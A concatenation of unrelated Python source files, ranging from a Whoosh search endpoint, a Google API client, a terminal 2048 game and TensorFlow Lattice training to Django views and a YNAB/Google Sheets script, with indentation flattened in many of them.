# 'shotpath': hit['shotpath'],
# "content": Markup(hi.highlight_hit(hit, "content")),
# "parenturl": hit["parenturl"],
# "picpath": "images/%s/%s" % (
# hit['picpath'].split('/')[-3], hit['picpath'].split('/')[-1]),
# "pagerank": scores[url_dict[hit["url"]]]
# })
# else:
# res.append({"title": hit['title'],
# "xueyuan": hit["xueyuan"],
# "url": hit["url"],
# 'shotpath': hit['shotpath'],
# "content": Markup(hi.highlight_hit(hit, "content")),
# "parenturl": hit["parenturl"],
# "picpath": "images/%s/%s" % (
# hit['picpath'].split('/')[-3], hit['picpath'].split('/')[-1]),
# "pagerank": scores[url_dict[hit["url"]]]
# })
# print(len(result))
# print(res)
# count = len(result)
#
# if count == 0:
# logging.warning("%d,没有查询到相关内容!" % 404)
# return "没有查询到相关内容!", 404
# else:
# # 记录查询日志
# log = "Response: "
# for item in res:
# log = log + " (name:%s,url:%s) " % (item["title"], item["url"])
# logging.info(log)
#
# # # 基于page rank 对链接进行排序
# # res.sort(key=lambda k:(k.get("pagerank",0)),reverse = True)
# # print(res)
#
# mysession["data"] = res # 使用会话session传递参数
# return jsonify({"url": "/display/%d&%s" % (count, query_sentence)})
# Basic query endpoint: supports prefix, wildcard, regex, phrase and boolean-operator queries
# Uses whoosh's Highlighter to return highlighted fragments of the matching text
@app.route('/index',methods=['GET','POST'])
def base_query():
assert request.path == '/index'
#print(dict(request.form)["query"][0])
#print(dict(request.form))
query_sentence = str(dict(request.form)["query"][0])
logging.info("Query sentence: %s"%query_sentence)
res = []
with ix.searcher() as searcher:
        # Parse the query text: if a field-specific query is requested, search that field only; otherwise use multi-field mode
        # highlight_xy marks whether the xueyuan (college) field should be highlighted; by default it is
highlight_xy = True
        # default multi-field query
query = qparser.MultifieldParser(["content","title","mtext","xueyuan"], ix.schema)
if query_sentence.endswith("$姓名$"):
            # query by name
query =qparser.SimpleParser("title",ix.schema)
query_sentence=query_sentence.strip('$姓名$')
elif query_sentence.endswith("$学院$"):
            # query by college (xueyuan)
query = qparser.SimpleParser("xueyuan", ix.schema)
query_sentence=query_sentence.strip('$学院$')
elif query_sentence.endswith("$网页$"):
            # query by page content
query = qparser.SimpleParser("content", ix.schema)
query_sentence=query_sentence.strip('$网页$')
#print(query_sentence)
        # register the query parser plugins
query.add_plugin(qparser.WildcardPlugin)
# query.remove_plugin_class(qparser.WildcardPlugin)
query.add_plugin(qparser.PrefixPlugin())
query.add_plugin(qparser.OperatorsPlugin)
query.add_plugin(qparser.RegexPlugin)
query.add_plugin(qparser.PhrasePlugin)
        # parse the text into a query object
q = query.parse(query_sentence)
logging.info("Query parse result: %s"%str(q))
print(q)
        # run the search
result = searcher.search(q,limit=20)
# print(result)
        # configure the highlight fragmenter
# Allow larger fragments
my_cf = highlight.ContextFragmenter(maxchars=200, surround=30)
hf = highlight.HtmlFormatter( tagname='em', classname='match', termclass='term')
hi = highlight.Highlighter(fragmenter=my_cf,formatter=hf)
for hit in result:
print(hit["picpath"])
print(hit["title"])
print(escape(hi.highlight_hit(hit,"content")))
if hit['picpath'] =='#':
if highlight_xy:
res.append({"title": hit['title'],
"xueyuan": Markup(hi.highlight_hit(hit, "xueyuan")),
"url": hit["url"],
'shotpath': hit['shotpath'],
"content": Markup(hi.highlight_hit(hit, "content")),
"parenturl": hit["parenturl"],
"picpath": '#',
"pagerank":scores[url_dict[hit["url"]]]
})
else:
res.append({"title": hit['title'],
"xueyuan": hit["xueyuan"],
"url": hit["url"],
'shotpath': hit['shotpath'],
"content": Markup(hi.highlight_hit(hit, "content")),
"parenturl": hit["parenturl"],
"picpath": '#',
"pagerank":scores[url_dict[hit["url"]]]
})
else:
if highlight_xy:
res.append({"title":hit['title'],
"xueyuan":Markup(hi.highlight_hit(hit, "xueyuan")),
"url":hit["url"],
'shotpath':hit['shotpath'],
"content":Markup(hi.highlight_hit(hit,"content")),
"parenturl": hit["parenturl"],
"picpath":"images/%s/%s"%(hit['picpath'].split('/')[-3],hit['picpath'].split('/')[-1]),
"pagerank": scores[url_dict[hit["url"]]]
})
else:
res.append({"title": hit['title'],
"xueyuan": hit["xueyuan"],
"url": hit["url"],
'shotpath': hit['shotpath'],
"content": Markup(hi.highlight_hit(hit, "content")),
"parenturl": hit["parenturl"],
"picpath": "images/%s/%s" % (
hit['picpath'].split('/')[-3], hit['picpath'].split('/')[-1]),
"pagerank": scores[url_dict[hit["url"]]]
})
print(len(result))
print(res)
count = len(result)
if count ==0:
logging.warning("%d,没有查询到相关内容!"%404)
return "没有查询到相关内容!",404
else:
            # write the response to the query log
log = "Response: "
for item in res:
log = log + " (name:%s,url:%s) " % (item["title"], item["url"])
logging.info(log)
            # # sort the hits by their PageRank score
            # res.sort(key=lambda k:(k.get("pagerank",0)),reverse = True)
            # print(res)
mysession["data"] = res # 使用会话session传递参数
return jsonify({"url":"/display/%d&%s"%(count,query_sentence)})
if __name__ == '__main__':
app.run(debug=False,use_reloader=False)
|
python
|
# Copyright 2016 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Generated client library for servicecontrol version v1."""
# NOTE: This file is originally auto-generated using google-apitools then
# style-correcting hand edits were applied. New behaviour should not be provided
# by hand, please re-generate and restyle.
from __future__ import absolute_import
from apitools.base.py import base_api
from . import servicecontrol_v1_messages as messages
class ServicecontrolV1(base_api.BaseApiClient):
"""Generated client library for service servicecontrol version v1."""
MESSAGES_MODULE = messages
_PACKAGE = u'servicecontrol'
_SCOPES = [u'https://www.googleapis.com/auth/cloud-platform',
u'https://www.googleapis.com/auth/servicecontrol']
_VERSION = u'v1'
_CLIENT_CLASS_NAME = u'ServicecontrolV1'
_URL_VERSION = u'v1'
_API_KEY = None
# pylint: disable=too-many-arguments
def __init__(self, url='', credentials=None,
get_credentials=True, http=None, model=None,
log_request=False, log_response=False,
credentials_args=None, default_global_params=None,
additional_http_headers=None):
"""Create a new servicecontrol handle."""
url = url or u'https://servicecontrol.googleapis.com/'
super(ServicecontrolV1, self).__init__(
url, credentials=credentials,
get_credentials=get_credentials, http=http, model=model,
log_request=log_request, log_response=log_response,
credentials_args=credentials_args,
default_global_params=default_global_params,
additional_http_headers=additional_http_headers)
self.services = self.ServicesService(self)
class ServicesService(base_api.BaseApiService):
"""Service class for the services resource."""
_NAME = u'services'
def __init__(self, client):
super(ServicecontrolV1.ServicesService, self).__init__(client)
self._method_configs = {
'check': base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'servicecontrol.services.check',
ordered_params=[u'serviceName'],
path_params=[u'serviceName'],
query_params=[],
relative_path=u'v1/services/{serviceName}:check',
request_field=u'checkRequest',
request_type_name=u'ServicecontrolServicesCheckRequest',
response_type_name=u'CheckResponse',
supports_download=False,
),
'report': base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'servicecontrol.services.report',
ordered_params=[u'serviceName'],
path_params=[u'serviceName'],
query_params=[],
relative_path=u'v1/services/{serviceName}:report',
request_field=u'reportRequest',
request_type_name=u'ServicecontrolServicesReportRequest',
response_type_name=u'ReportResponse',
supports_download=False,
),
}
self._upload_configs = {
}
def check(self, request, global_params=None):
"""Checks quota, abuse status etc. to decide whether the given
      operation should proceed. It should be called by the service
before the given operation is executed.
This method requires the `servicemanagement.services.check`
permission on the specified service. For more information, see
[Google Cloud IAM](https://cloud.google.com/iam).
Args:
request: (ServicecontrolServicesCheckRequest) input message
global_params: (StandardQueryParameters, default: None)
global arguments
Returns:
(CheckResponse) The response message.
"""
config = self.GetMethodConfig('check')
return self._RunMethod(
config, request, global_params=global_params)
def report(self, request, global_params=None):
"""Reports an operation to the service control features such as
billing, logging, monitoring etc. It should be called by the
service after the given operation is completed.
This method requires the `servicemanagement.services.report`
permission on the specified service. For more information, see
[Google Cloud IAM](https://cloud.google.com/iam).
Args:
request: (ServicecontrolServicesReportRequest) input message
global_params: (StandardQueryParameters, default: None) global
arguments
Returns:
(ReportResponse) The response message.
"""
config = self.GetMethodConfig('report')
return self._RunMethod(
config, request, global_params=global_params)
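# Minimal usage sketch (comments only; assumes application default credentials
# are available, and the service name below is purely illustrative):
#   client = ServicecontrolV1()
#   req = messages.ServicecontrolServicesCheckRequest(serviceName='example.appspot.com')
#   response = client.services.check(req)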
|
python
|
#!/usr/bin/env python3
import curses
from random import randrange, choice # generate and place new tile
from collections import defaultdict
letter_codes = [ord(ch) for ch in 'WASDRQwasdrq']
actions = ['Up', 'Left', 'Down', 'Right', 'Restart', 'Exit']
actions_dict = dict(zip(letter_codes, actions * 2))
def get_user_action(keyboard):
char = "N"
while char not in actions_dict:
char = keyboard.getch()
return actions_dict[char]
def transpose(field):
return [list(row) for row in zip(*field)]
def invert(field):
return [row[::-1] for row in field]
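# Quick illustration of the two grid helpers:
#   transpose([[1, 2], [3, 4]]) -> [[1, 3], [2, 4]]
#   invert([[1, 2], [3, 4]])    -> [[2, 1], [4, 3]]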
class GameField(object):
def __init__(self, height=4, width=4, win=2048):
self.height = height
self.width = width
        self.win_value = win
self.score = 0
self.highscore = 0
self.reset()
def reset(self):
if self.score > self.highscore:
self.highscore = self.score
self.score = 0
self.field = [[0 for i in range(self.width)] for j in range(self.height)]
self.spawn()
self.spawn()
def move(self, direction):
def move_row_left(row):
            def tighten(row):  # squeeze non-zero elements together
new_row = [i for i in row if i != 0]
new_row += [0 for i in range(len(row) - len(new_row))]
return new_row
def merge(row):
pair = False
new_row = []
for i in range(len(row)):
if pair:
new_row.append(2 * row[i])
self.score += 2 * row[i]
pair = False
else:
if i + 1 < len(row) and row[i] == row[i + 1]:
pair = True
new_row.append(0)
else:
new_row.append(row[i])
assert len(new_row) == len(row)
return new_row
return tighten(merge(tighten(row)))
moves = {}
moves['Left'] = lambda field: \
[move_row_left(row) for row in field]
moves['Right'] = lambda field: \
invert(moves['Left'](invert(field)))
moves['Up'] = lambda field: \
transpose(moves['Left'](transpose(field)))
moves['Down'] = lambda field: \
transpose(moves['Right'](transpose(field)))
if direction in moves:
if self.move_is_possible(direction):
self.field = moves[direction](self.field)
self.spawn()
return True
else:
return False
def is_win(self):
return any(any(i >= self.win_value for i in row) for row in self.field)
def is_gameover(self):
return not any(self.move_is_possible(move) for move in actions)
def draw(self, screen):
help_string1 = '(W)Up (S)Down (A)Left (D)Right'
help_string2 = ' (R)Restart (Q)Exit'
gameover_string = ' GAME OVER'
win_string = ' YOU WIN!'
def cast(string):
screen.addstr(string + '\n')
def draw_hor_separator():
top = '┌' + ('┬──────' * self.width + '┐')[1:]
mid = '├' + ('┼──────' * self.width + '┤')[1:]
bot = '└' + ('┴──────' * self.width + '┘')[1:]
separator = defaultdict(lambda: mid)
separator[0], separator[self.height] = top, bot
if not hasattr(draw_hor_separator, "counter"):
draw_hor_separator.counter = 0
cast(separator[draw_hor_separator.counter])
draw_hor_separator.counter += 1
def draw_row(row):
            cast(''.join('│{: ^5} '.format(num) if num > 0 else '│      ' for num in row) + '│')
screen.clear()
cast('SCORE: ' + str(self.score))
if 0 != self.highscore:
            cast('HIGHSCORE: ' + str(self.highscore))
for row in self.field:
draw_hor_separator()
draw_row(row)
draw_hor_separator()
if self.is_win():
cast(win_string)
else:
if self.is_gameover():
cast(gameover_string)
else:
cast(help_string1)
cast(help_string2)
def spawn(self):
new_element = 4 if randrange(100) > 89 else 2
        (i, j) = choice([(i, j) for i in range(self.height) for j in range(self.width) if self.field[i][j] == 0])
self.field[i][j] = new_element
def move_is_possible(self, direction):
def row_is_left_movable(row):
def change(i): # true if there'll be change in i-th tile
if row[i] == 0 and row[i + 1] != 0: # Move
return True
if row[i] != 0 and row[i + 1] == row[i]: # Merge
return True
return False
return any(change(i) for i in range(len(row) - 1))
check = {}
check['Left'] = lambda field: \
any(row_is_left_movable(row) for row in field)
check['Right'] = lambda field: \
check['Left'](invert(field))
check['Up'] = lambda field: \
check['Left'](transpose(field))
check['Down'] = lambda field: \
check['Right'](transpose(field))
if direction in check:
return check[direction](self.field)
else:
return False
def main(stdscr):
curses.use_default_colors()
game_field = GameField(win=32)
state_actions = {} # Init, Game, Win, Gameover, Exit
def init():
game_field.reset()
return 'Game'
state_actions['Init'] = init
def not_game(state):
game_field.draw(stdscr)
action = get_user_action(stdscr)
responses = defaultdict(lambda: state)
responses['Restart'], responses['Exit'] = 'Init', 'Exit'
return responses[action]
state_actions['Win'] = lambda: not_game('Win')
state_actions['Gameover'] = lambda: not_game('Gameover')
def game():
game_field.draw(stdscr)
action = get_user_action(stdscr)
if action == 'Restart':
return 'Init'
if action == 'Exit':
return 'Exit'
if game_field.move(action): # move successful
if game_field.is_win():
return 'Win'
if game_field.is_gameover():
return 'Gameover'
return 'Game'
state_actions['Game'] = game
state = 'Init'
while state != 'Exit':
state = state_actions[state]()
curses.wrapper(main)
|
python
|
# https://qiita.com/taigamikami/items/6c69fc813940f838e96c
import numpy as np
import tensorflow as tf
import tensorflow_lattice as tfl
import matplotlib.pyplot as plt
import input_data
# ====================================
# Training data
# ====================================
#x_train = np.arange(-5, 5, 0.2)
#noise = np.random.normal(0, 4, x_train.shape)
#y_train = np.square(x_train) + noise
data = input_data.read_data("train")
x_train = data.T[0]
y_train = data.T[1]
batch_size = len(x_train)
# input_fn = tf.estimator.inputs.numpy_input_fn(
# {"x": x_train}, y_train, batch_size=batch_size, num_epochs=None, shuffle=True)
train_input_fn = tf.estimator.inputs.numpy_input_fn(
{"x": x_train}, y_train, batch_size=batch_size, num_epochs=1000, shuffle=False)
# ====================================
# Training setup
# ====================================
# Declare the list of feature columns. There is only one numeric feature here;
# many other, more complex and useful column types exist.
feature_columns = [
tf.feature_column.numeric_column("x")
]
# Hyperparameters.
num_keypoints = 10
# hparams = tfl.CalibratedRtlHParams(
# num_keypoints=num_keypoints,
# num_lattices=5,
# lattice_rank=2,
# learning_rate=0.01)
hparams = tfl.CalibratedLinearHParams(
num_keypoints=num_keypoints,
num_lattices=10,
# lattice_rank=2,
learning_rate=0.1)
# Set feature monotonicity.
#hparams.set_feature_param('x', 'monotonicity', -1)
# Define keypoint init.
keypoints_init_fns = {
'x': lambda: tfl.uniform_keypoints_for_signal(num_keypoints,
input_min=-5.0,
input_max=5.0,
output_min=0.0,
output_max=25.0),
}
print("keypoints_init_fns: %r" % keypoints_init_fns)
# ====================================
# Training
# ====================================
# lattice_estimator = tfl.calibrated_lattice_regressor(
# feature_columns=feature_columns,
# hparams=hparams,
# keypoints_initializers_fn=keypoints_init_fns
# )
lattice_estimator = tfl.calibrated_linear_regressor(
feature_columns=feature_columns,
hparams=hparams,
keypoints_initializers_fn=keypoints_init_fns
)
# Train!
train_input_fn = tf.estimator.inputs.numpy_input_fn(
x={"x": x_train},
y=y_train,
batch_size=batch_size,
num_epochs=1000,
shuffle=False)
train_metrics = lattice_estimator.train(input_fn=train_input_fn)
# ====================================
# Model evaluation
# ====================================
eval_metrics = lattice_estimator.evaluate(input_fn=train_input_fn)
print("train metrics: %r"% eval_metrics)
# ====================================
# Evaluation data
# ====================================
eval_data = input_data.read_data("eval")
x_eval = eval_data.T[0]
y_eval = eval_data.T[1]
#
eval_input_fn = tf.estimator.inputs.numpy_input_fn(
{"x": x_eval}, y_eval, batch_size=4, num_epochs=1000, shuffle=False)
eval_metrics = lattice_estimator.evaluate(input_fn=eval_input_fn)
print("eval metrics: %r"% eval_metrics)
# ====================================
# Prediction
# ====================================
predict_data = input_data.read_data("predict")
x_predict = predict_data.T[0]
predict_input_fn = tf.estimator.inputs.numpy_input_fn(
x={"x": x_predict},
y=None,
batch_size=batch_size,
num_epochs=1,
shuffle=False
)
predict_results = list(lattice_estimator.predict(input_fn=predict_input_fn))
# ====================================
# Plot the data
# ====================================
fig = plt.figure()
ax1 = fig.add_subplot(1, 1, 1)
ax1.scatter(x_train, y_train)
y_predict = np.array([])
for prediction in predict_results:
y_predict = np.append(y_predict, prediction["predictions"][0])
ax1.plot(x_eval, y_predict, "r-")
plt.show()
|
python
|
config = {
"--acoustic-scale":[0.1,float],
"--allow-partial":["false",str],
"--beam":[13,int],
"--beam-delta":[0.5,float],
"--delta":[0.000976562,float],
"--determinize-lattice":["true",str],
"--hash-ratio":[2,int],
"--lattice-beam":[8,int],
"--max-active":[7000,int],
"--max-mem":[50000000,int],
"--min-active":[200,int],
"--minimize":["false",str],
"--phone-determinize":["true",str],
"--prune-interval":[25,int],
"--word-determinize":["true",str],
"--word-symbol-table":["",str]
}
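# Minimal sketch of one way this table might be consumed (an assumption about
# intent, not something stated in this file): each entry could be rendered as a
# Kaldi-style command-line option from its stored default, e.g.
#   opts = ['%s=%s' % (name, default) for name, (default, _type) in config.items()]
#   -> ['--acoustic-scale=0.1', '--allow-partial=false', ...]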
|
python
|
"""
Odoo client using Openerp proxy
"""
# https://pypi.org/project/openerp_proxy/
from openerp_proxy import Client as erpClient
class Client():
"""
Odoo client
"""
def __init__(self, username:str, password:str = '', database:str = '', host:str = '', port:int = 443, protocol:str = 'json-rpcs'):
"""
Initialize parameters here
"""
if len(username) == 0:
raise ValueError('Missing username argument')
self.username = username
self.password = password
self.database = database
self.host = host
self.port = port
self.protocol = protocol
self.client = None # Set this in connect or enter
self.user = None
def connect(self):
"""
Connect to Odoo
"""
self.client = erpClient(
host=self.host,
dbname=self.database,
user=self.username,
pwd=self.password,
protocol=self.protocol,
port=self.port)
# Check connection by fetching user name
self.user = self.client.user
def __enter__(self):
self.connect()
return self
def __exit__(self, type, value, traceback):
pass
def search(self, db_name, filters):
"""
Search ids for db_name using filters
"""
return self.client[db_name].search(filters)
def search_read(self, db_name, filters):
"""
Search data for db_name using filters
"""
return self.client[db_name].search_read(filters)
def read(self, db_name, ids, fields=None):
"""
Read data using ids list or int. Fields is optional
"""
return self.client[db_name].read(ids, fields)
def write(self, db_name, ids, field):
"""
Write data to db_name with id
"""
return self.client[db_name].write(ids, field)
def create(self, db_name, fields):
return self.client[db_name].create(fields)
def start_tracking(self, args):
return self.client['project.task'].start_tracking(args)
def terminate_tracking(self, args):
return self.client['project.task'].terminate_tracking(args)
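# Minimal usage sketch (hypothetical credentials, host and domain filter):
#   with Client('admin', password='secret', database='prod', host='odoo.example.com') as odoo:
#       task_ids = odoo.search('project.task', [('stage_id.name', '=', 'In Progress')])
#       tasks = odoo.read('project.task', task_ids, fields=['name'])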
|
python
|
import ROOT
import numpy as np
# fast index lookup
from melp.libs.misc import index_finder
def save_histo(filename: str, dt_dict: dict):
histo_file = ROOT.TFile.Open(filename, "RECREATE")
for keys in dt_dict.keys():
name_z = str(keys) + "z"
name_phi = str(keys) + "phi"
histo_file.WriteObject(dt_dict[keys][0], name_z)
histo_file.WriteObject(dt_dict[keys][1], name_phi)
def read_histo(filename: str) -> dict:
global histo_file
histo_file = ROOT.TFile.Open(filename, "READ")
dt_dict = {}
for key in histo_file.GetListOfKeys():
h = key.ReadObj()
name = h.GetName()
dict_key = name.replace("_z", "")
dict_key = int(dict_key.replace("_phi", ""))
if dict_key not in dt_dict.keys():
dt_dict[dict_key] = [None, None]
if "z" in name:
dt_dict[dict_key][0] = h
# print(h)
elif "phi" in name:
dt_dict[dict_key][1] = h
return dt_dict
# ---------------------------------------
#
# Generates a dictionary of ROOT TH1D histograms
# -> dict[tileid] = [hist_z, hist_phi]
#
def fill_dt_histos(detector, ttree_mu3e, histo_options: tuple) -> dict:
cluster_counter = 0
hist_dict = {}
nbins, lo, hi = histo_options
# Generating empty histos:
for tile in detector.TileDetector.tile:
histo_name_z = str(tile) + "_z"
histo_name_phi = str(tile) + "_phi"
hist_dict[tile] = [ROOT.TH1D(histo_name_z, histo_name_z, nbins, lo, hi),
ROOT.TH1D(histo_name_phi, histo_name_phi, nbins, lo, hi)]
# tilehits = ROOT.vector('int')()
# tilehitstime = ROOT.vector('double')()
# ttree_mu3e.SetBranchStatus("tilehit_tile", 1)
# ttree_mu3e.SetBranchStatus("tilehit_time", 1)
# ttree_mu3e.SetBranchAddress("tilehit_tile", tilehits)
# ttree_mu3e.SetBranchAddress("tilehit_time", tilehitstime)
for frame in range(ttree_mu3e.GetEntries()):
ttree_mu3e.GetEntry(frame)
# Printing status info
if frame % 10000 == 0:
print("Searching clusters. Progress: ", np.round(frame / ttree_mu3e.GetEntries() * 100), " % , Found: ",
cluster_counter, end='\r')
# TODO: index_finder cant handle multiple events on one tile in one frame!!!
# --> skipping frame (looses some data)
# Analyzing frame
for hit_tile_index in range(len(ttree_mu3e.tilehit_tile)):
hit_tile = ttree_mu3e.tilehit_tile[hit_tile_index]
# -----------------------------
# Look for clusters in z-dir
neighbour_z_id = detector.TileDetector.getNeighbour(hit_tile, "right")
if neighbour_z_id in ttree_mu3e.tilehit_tile and neighbour_z_id is not False:
# find associated tile hit
hit_tile_assoc = index_finder(list(ttree_mu3e.tilehit_tile), neighbour_z_id)
# workaround for multiple hits in the same tile
try:
hit_tile_assoc = int(*hit_tile_assoc)
except (TypeError, ValueError):
continue
# calculate dt
# TODO: TOF maybe with edep ?
hit_time_1 = ttree_mu3e.tilehit_time[hit_tile_index] # + detector.TileDetector.tile[hit_tile].dt_truth
hit_time_2 = ttree_mu3e.tilehit_time[hit_tile_assoc] # + detector.TileDetector.tile[
# neighbour_z_id].dt_truth
dt = hit_time_2 - hit_time_1
# Fill histogram
hist_dict[hit_tile][0].Fill(dt)
cluster_counter += 1
# -----------------------------
# Look for clusters in phi-dir
neighbour_phi_id = detector.TileDetector.getNeighbour(hit_tile, "up")
if neighbour_phi_id in ttree_mu3e.tilehit_tile and neighbour_phi_id is not False:
hit_tile = ttree_mu3e.tilehit_tile[hit_tile_index]
# find associated tile hit
hit_tile_assoc = index_finder(list(ttree_mu3e.tilehit_tile), neighbour_phi_id)
# workaround for multiple hits in the same tile
try:
hit_tile_assoc = int(*hit_tile_assoc)
except (TypeError, ValueError):
continue
# calculate dt
# TODO: TOF maybe with edep ?
hit_time_1 = ttree_mu3e.tilehit_time[hit_tile_index] # + detector.TileDetector.tile[hit_tile].dt_truth
hit_time_2 = ttree_mu3e.tilehit_time[hit_tile_assoc] # + detector.TileDetector.tile[
# neighbour_phi_id].dt_truth
dt = hit_time_2 - hit_time_1
# Fill histogram
hist_dict[hit_tile][1].Fill(dt)
cluster_counter += 1
print("Searching clusters. Progress: ", 100, " % , Found: ", cluster_counter)
return hist_dict
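# Minimal usage sketch (hypothetical file and tree names; `detector` is assumed
# to be a melp detector object providing TileDetector):
#   root_file = ROOT.TFile.Open("mu3e_sorted.root")
#   ttree = root_file.Get("mu3e")
#   histos = fill_dt_histos(detector, ttree, (100, -5.0, 5.0))
#   save_histo("dt_histograms.root", histos)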
|
python
|
import logging
from collections import namedtuple
import magic
from io import BytesIO
from django.views.generic import DetailView
from django.http import HttpResponse, HttpResponseRedirect
from django.urls import reverse
import matplotlib
import matplotlib.pyplot
import aplpy
import astropy
from scheduler.models import Workflow
matplotlib.use('agg')
astropy.log.setLevel('ERROR')
logger = logging.getLogger(__name__)
filemagic = magic.Magic() # flags=magic.MAGIC_MIME_TYPE)
class FitsView(DetailView):
"""
    Returns a rendered image. Uses the `path` keyword argument. Only
    allows files that are somewhere inside the settings.RESULTS_DIR folder.
"""
model = Workflow
def render_to_response(self, context, **kwargs):
size = int(self.request.GET.get('size', 5))
vmin = float(self.request.GET.get('vmin', 0))
vmax = float(self.request.GET.get('vmax', 0.1))
colorbar = (self.request.GET.get('colorbar', 'True').lower() != 'false')
fullpath = self.object.get_result(self.kwargs['path'])
figure = matplotlib.pyplot.figure(figsize=(size, size))
if colorbar:
subplot = [0.0, 0.0, 0.9, 1]
else:
subplot = [0.0, 0.0, 1, 1]
try:
fig = aplpy.FITSFigure(str(fullpath),
figure=figure,
subplot=subplot,
figsize=(size, size))
except IOError as e:
matplotlib.pyplot.text(0.1, 0.8, str(e))
else:
fig.show_colorscale(vmin=vmin, vmax=vmax)
if colorbar:
fig.add_colorbar()
fig.colorbar.set_font(size='xx-small')
fig.axis_labels.hide()
fig.tick_labels.hide()
fig.ticks.hide()
buf = BytesIO()
figure.canvas.print_figure(buf, format='png')
return HttpResponse(buf.getvalue(), content_type='image/png')
DirItem = namedtuple('DirItem', ['fullpath', 'name', 'type', 'size',
'modified', 'is_image'])
class SomethingView(DetailView):
"""
    Redirects to the correct view according to the file type.
    Renders an error page if the file type is not understood.
"""
model = Workflow
template_name = 'viewer/unknowntype.html'
def get_context_data(self, **kwargs):
context = super(SomethingView, self).get_context_data(**kwargs)
fullpath = self.object.get_result(self.kwargs['path'])
context['type'] = filemagic.id_filename(str(fullpath))
context['path'] = self.kwargs['path']
return context
def render_to_response(self, context, **response_kwargs):
type_ = context['type']
if type_.startswith("FITS image data"):
return HttpResponseRedirect(reverse('scheduler:viewer_fits',
kwargs={'pk': self.object.id,
'path': self.kwargs['path']}))
if type_.startswith("ASCII text") or \
type_.startswith('UTF-8 Unicode text'):
return HttpResponseRedirect(reverse('scheduler:viewer_text',
kwargs={'pk': self.object.id,
'path': self.kwargs['path']}))
if type_.startswith('PNG image data') or \
type_.startswith('JPEG image data') or \
type_.startswith('HTML document'):
return HttpResponseRedirect(f"{self.object.public_serve()}/outdir/{self.kwargs['path']}")
return super(SomethingView, self).render_to_response(context)
class TextView(DetailView):
model = Workflow
template_name = 'viewer/textfile.html'
def get_context_data(self, **kwargs):
context = super(TextView, self).get_context_data(**kwargs)
path = self.kwargs['path']
fullpath = f"{self.object.outdir()}/{path}"
with open(fullpath, 'r') as f:
context['path'] = path
context['content'] = ''.join(f.readlines())
return context
class Js9View(DetailView):
"""
Will redirect to correct view according to file type.
Will render error page if file type is not understood.
"""
model = Workflow
template_name = 'viewer/js9.html'
def render_to_response(self, context, **response_kwargs):
response = super().render_to_response(context, **response_kwargs)
response["Access-Control-Allow-Origin"] = "js9.si.edu"
response["Access-Control-Allow-Methods"] = "GET, OPTIONS"
response["Access-Control-Max-Age"] = "1000"
response["Access-Control-Allow-Headers"] = "X-Requested-With, Content-Type"
return response
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
context['path'] = f"{self.object.public_serve()}/outdir/{self.kwargs['path']}"
return context
|
python
|
from django.contrib import admin
from django.contrib.auth import get_user_model
from django.contrib.auth.admin import UserAdmin
from .models import Favorite, Subscription
User = get_user_model()
class FavoriteAdmin(admin.ModelAdmin):
model = Favorite
list_display = ('user', 'recipe')
class SubscriptionAdmin(admin.ModelAdmin):
model = Subscription
list_display = ('user', 'author')
class UserAdmin(UserAdmin):
model = User
list_display = ('email', 'username', 'is_staff', 'is_active',)
list_filter = ('email', 'username', 'is_staff', 'is_active',)
fieldsets = (
(None, {'fields': ('username', 'email', 'password')}),
('Description', {'fields': ('first_name', 'last_name')}),
('Permissions', {'fields': ('is_staff', 'is_active')}),
)
add_fieldsets = (
(None, {
'classes': ('wide',),
'fields': (
'email', 'password1', 'password2', 'is_staff', 'is_active'
)
}),
)
search_fields = ('email', 'username')
ordering = ('email',)
admin.site.unregister(User)
admin.site.register(Favorite, FavoriteAdmin)
admin.site.register(Subscription, SubscriptionAdmin)
admin.site.register(User, UserAdmin)
|
python
|
# -*- coding: utf-8 -*-
"""
Created on Sat Sep 7 18:40:45 2019
@author: ryder
"""
#%%
import os
import pandas as pd
from pynabapi import YnabClient
import pygsheets
import datetime
import time
import re
#%%
# should create google_ledger object
with open('keys/google_expenses_sheet_key.txt', 'r') as g_sheet_id_key_txt:
GOOGLE_SHEET_ID_KEY = g_sheet_id_key_txt.readline().strip()
gc = pygsheets.authorize(service_account_file='keys/service_account_credentials.json')
sh = gc.open_by_key(GOOGLE_SHEET_ID_KEY)
#%% GOOGLE FUNCTIONS
def load_and_process_sheet(sh=sh, tab=0):
w = sh.worksheet('index', tab)
ret_df = w.get_as_df(has_header=True, start='A2')
# dollars = ret_df.Amount.astype(str).str.extract(r'(\d+)')
# ret_df.loc[:, 'Amount'] = ret_df.Amount.astype(str).str.extract(r'(\d+)')
ret_df.Amount = ret_df.Amount.astype(str).str.extract(r'(\d+)')
# ret_df.loc[:, 'Timestamp'] = pd.to_datetime(ret_df.Timestamp)
ret_df.Timestamp = pd.to_datetime(ret_df.Timestamp)
return(ret_df.reset_index(drop=True))
# return(dollars)
def load_and_process_all_sheets(sh=sh):
colnames = ['Timestamp', 'Payee', 'Amount', 'Purpose', 'Description']
all_sheets = pd.DataFrame(columns = colnames)
for sheetnum in range(len(sh.worksheets())):
curr_sheet = load_and_process_sheet(sh, sheetnum)
        sheet_title = re.search(r'(?<=Worksheet ).+(?= index)',
                                str(sh.worksheets()[sheetnum])).group(0)
        if curr_sheet.shape[1] != 5:
            raise Exception(f'Worksheet {sheet_title} (index {sheetnum}) has the '
                            f'wrong dimensions.')
# print(curr_sheet.columns)
all_sheets = all_sheets.append(curr_sheet)
return(all_sheets.sort_values('Timestamp', ascending=False))
#%%
def get_last_trns_date(sh=sh, payee_name = 'Ryder', format = 'datetime'):
# Get all transactions in Google Sheets
__all_trans = load_and_process_all_sheets()
__max_date = (
__all_trans
.loc[__all_trans.Payee == payee_name]['Timestamp']
.max()
)
if format == 'datetime':
return(__max_date)
elif format == 'string':
return(__max_date.strftime('%Y-%m-%d'))
#%%
def get_trans_from_ynab(sh=sh, since_date=get_last_trns_date()):
# since_date = get_last_trns_date()
with open('keys/ynab_api_key.txt', 'r') as y_api_key_txt:
YNAB_CLIENT_KEY = y_api_key_txt.readline().strip()
with open('keys/ynab_budget_id.txt', 'r') as y_bud_id_txt:
YNAB_BUDGET_ID = y_bud_id_txt.readline().strip()
